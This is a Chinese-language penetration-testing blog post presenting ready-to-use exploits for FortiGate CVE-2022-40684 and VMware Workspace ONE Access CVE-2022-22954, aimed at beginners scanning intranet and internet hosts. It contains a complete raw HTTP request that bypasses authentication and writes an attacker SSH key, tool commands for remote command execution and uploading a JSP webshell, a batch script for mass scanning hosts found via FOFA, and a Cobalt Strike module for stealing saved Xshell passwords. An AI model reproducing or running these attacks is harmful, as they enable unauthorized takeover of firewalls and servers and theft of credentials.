【漏洞速递 | 附EXP】CVE-2022-40684 & CVE-2022-22954
2022-12-25 22:17:21 Author: 渗透安全团队(查看原文) 阅读量:34 收藏

本文提到的两漏洞早已公开一段时间并被很多人利用,Ladon添加只是为方便新手捡漏学习,外网存在漏洞可能不多了,但内网渗透也可试试捡漏。

0x001 FortiGate  CVE-2022-40684 未授权写SSH-KEY

Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy 为网站和基于云的应用程序提供安全 Web 网关、安全功能、无与伦比的性能以及最佳用户体验。

近日,Fortinet修复了一个存在 FortiGate 防火墙和 FortiProxy Web 代理中的身份验证绕过漏洞(CVE-2022-40684),该漏洞可能允许攻击者在易受攻击的设备上执行未经授权的操作,攻击者通过向易受攻击的目标发送特制的 HTTP 或 HTTPS 请求进行绕过身份认证以管理员身份在控制面板中执行任意操作。

7.0.0 <= FortiOS <= 7.0.6

7.2.0 <= FortiOS <= 7.2.1

7.0.0 <= FortiProxy <= 7.0.6

FortiProxy = 7.2.0

FortiSwitchManager = 7.0.0

FortiSwitchManager = 7.2.0

FortiGate虚拟化环境

https://pan.baidu.com/s/1eCcjGwqfHqklEFfSurTk7Q?pwd=2jx1

漏洞POC

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1Host: 192.168.50.99User-Agent: Report RunnerAccept-Encoding: gzip, deflate, brAccept: */*Connection: keep-aliveForwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"Content-Length: 409Content-Type:application/json {"ssh-public-key1": "\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0/ljPV1Bj2kDxivuK7t4Y8MbIYegGvXza7cRwW9uI49eXccQTJr8kRvwUO5Stf01N5wjgZWYXZEAR3kRRCY/UHF6mZT41mCusbJX/IKrRTcmvwWnDysZuFD3YUZuuQvgWiulvOLczUcUXuRwRQj5gUNdFnbB1M/3t0sg2URXPqEqtNxfCQGpeUswpiGPQRCwU6fW0j5GpsX8CtOk/xagvZDRbBTJCqTR61iUxMO/6c82IxQxVb7Fuf6yvwcQhEPcRJ0YPXj3MeCOZQl/n49q7BQeiUqd+4IOrAqoZ08itGHm1iCsgOhacblcV7z5bnf81Z2wJpH5ja626mwxG2ZD/Q==\""}

首先通过OnlinePC探测发现内网中存在FortiGate主机,网上搜索发现该产品7.2.1版本存在未授权漏洞,可Put写入SSH-KEY,任意密码连接SSH。

为了方便,Ladon已集成一键添加Key模块,用户为admin密码admin123,用法命令如下: Ladon IP或URL CVE-2022-40684

新手也可以使用Ladon Study直接使用,熟悉相关命令

成功 会提示 SSH Key ISOK  (使用CS或Powershell打内网 用法一致)

使用Xshell导入Ladon目录下的密钥文件 id_rsa_2048,填写密码admin123,即可连接FortiGate,然后愉快玩耍。

0x002 Vmware Acces CVE-2022-22954  GetShell

简介

安全研究人员警告,VMware身份管理方案Workspace ONE Access一项半年前发现并修补的重大漏洞已经遭到滥用,被植入多项恶意程序。

VMware Workspace One Access原名Identity Manager,今年4月VMware公布并修补了编号CVE-2022-22954的漏洞,可被攻击者通过发送带有恶意指令的消息,发动指令注入攻击,为一项风险值9.8的重大漏洞。

POC: https://github.com/bewhale/CVE-2022-22954

// 命令执行python CVE-2022-22954.py -u https://x.x.x.x -c "id"// 上传文件,windows 设置文件名需要指定路径python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp  -fp "D:\Desktop\shell.jsp"// 上传到指定路径python CVE-2022-22954.py -u https://x.x.x.x -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp"  -fp "D:\Desktop\shell.jsp"

Ladon批量脚本  cve-2022-22954.ini

[Ladon]exe=pythonarg=CVE-2022-22954.py -u $ip$ -c idlog=true

PS:由于fofa收录该产品的数量非常少,所以懒得将PY转成dll,使用INI调用PY批量探测目标,如果数量大,使用PY脚本就不太好。Ladon最佳插件就是.net写的dll,才能完美内存加载占用最少的资源,使用最快速度扫描。

批量命令

通过Fofa或相关搜索引擎,导出vmware主机,然后Ladon批量检测

Ladon url.txt cve-2022-22954.ini

为了方便查看存在的漏洞结果,对PY脚本做一点小修改,回显结果如下

上面是不指定目标乱扫,对于指定目标,比如目标内网或者外网C段、B段,我们可以使用上一篇文章提到的WhatCMS模块探测,若发现存在该产品,即可使用POC打,当然也可以直接使用POC批量探测内网或外网。

Ladon WhatCMS新增多个防火墙、邮服识别

0x003  Xshell密码读取

加载ladon的cna脚本后,Cobalt Strike右键菜单点击就可内存加载XshellPwd模块读取密码,整个过程不会有Ladon文件出现在目标电脑。

本地安装有xshell,自己忘记SSH密码,也可以直接Ladon study读取密码

文章来源:k8实验室


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495251&idx=2&sn=d0a350a054a3fd4e837583c35552b3ce&chksm=c17613fcf6019aea59ddcbb277ae95750e7fc719379c5db183de9665584ff03485bf47d79190#rd
如有侵权请联系:admin#unsafe.sh